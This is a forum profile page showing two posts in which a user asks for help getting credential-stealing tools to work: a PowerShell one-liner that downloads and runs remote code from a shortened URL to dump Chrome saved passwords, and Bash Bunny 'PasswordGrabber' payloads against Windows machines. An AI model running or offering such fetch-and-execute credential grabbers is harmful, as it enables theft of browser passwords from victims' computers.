Jump to content

calin42

Members
  • Content Count

    2
  • Joined

  • Last visited

About calin42

  • Rank
    Newbie

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. calin42

    Violation of CoC

    Hello, i have this problem : Get-ChromeCreds : Le terme «Get-ChromeCreds» n'est pas reconnu comme nom d'applet de commande, fonction, fichier de script ou programme exécutable. Vérifiez l'orthographe du nom, ou si un chemin d'accès existe, vérifiez que le chemin d'accès est correct et réessayez. Au caractère Ligne:2 : 73 + ... ent).DownloadString('http://bit.ly/2nea8tb'); Get-ChromeCreds | ft Us ... + ~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Get-ChromeCreds:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException So, i isolated the probleme : this line : "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2nea8tb'); Get-ChromeCreds" And its working perfectly. But not with the script. Little translation, it says that Get-ChromeCreds is not a valid function, which i think means he failed to download. But idk why its working when i execute the line myself, and not when the script does it. Thx for help :)
  2. Hello, i just got my bash bunny yday, and i tried fews payloads straight after setting up languages & tools. I only managed to run, with the 1.3 firmware, the PasswordGrabber exploit with the lazaro.exe on a windows 7 computer. All others scripts claming "browsers creds" and other, are actually not working, on the 1.3. I can read that many people managed to make it work on a 1.2 or 1.1 version. If any of you, could actually tell me if this is a known problem, or tell me if you managed to run a creds grabber on a win8 or 10, with the 1.3 firmware. Thx for your answers :)
×
×
  • Create New...